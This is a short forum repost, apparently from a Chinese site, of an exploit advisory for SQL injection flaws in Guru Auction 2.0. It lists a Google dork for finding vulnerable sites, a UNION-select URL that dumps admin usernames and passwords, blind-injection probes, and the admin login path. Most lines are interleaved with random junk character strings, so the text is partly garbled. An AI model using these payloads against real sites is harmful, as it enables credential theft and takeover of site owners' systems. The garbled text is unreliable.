Guru Auction 2.0 Multiple SQL Injection Vulnerabilities1 u& h: B3 A* }' t! G' h
2 h" Y$ [' J- z0 {" c+ Y) L# K
作者 : v3n0m
. C' a8 _+ H& A1 U9 Y应用 : Guru Auction 2.0" `- y. ^4 m2 w2 S
Price : $49
3 e0 K. v8 y1 p+ w2 r2 VVendor : http://www.guruscript.com/
8 @" q3 k2 n; JGoogle Dork : inurl:subcat.php?cate_id=$ Y2 ]% o" G& O0 f; D4 F1 K
+ w3 z3 l) W& L o0 T# C9 V
SQLi p0c:( Q+ d+ m2 Q$ A2 b
~~~~~~~~~~
3 w0 K2 k9 x, |5 f" M3 |http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
7 r# w) V8 @8 g; V
) S$ l/ G: V* E% ^6 D1 m+ c' t$ B
# f3 r1 S. d9 N/ n盲注 p0c:
* ^' v) j9 D: V. ~6 h~~~~~~~~~~: F& c# h: T% V
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true$ G- M" `: X4 r. ?, c- [7 s
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
! p1 M' z" e# a" f7 t+ |
" m6 T6 S6 m \管理登录入口:$ ~6 K" T* I* Z
~~~~~~~~~~
2 ?7 }- ]# R2 `http://domain.tld/[path]/admin/
' M3 J# v; b7 x. d |
发表于 2012-12-31 09:24:05
收藏
支持
反对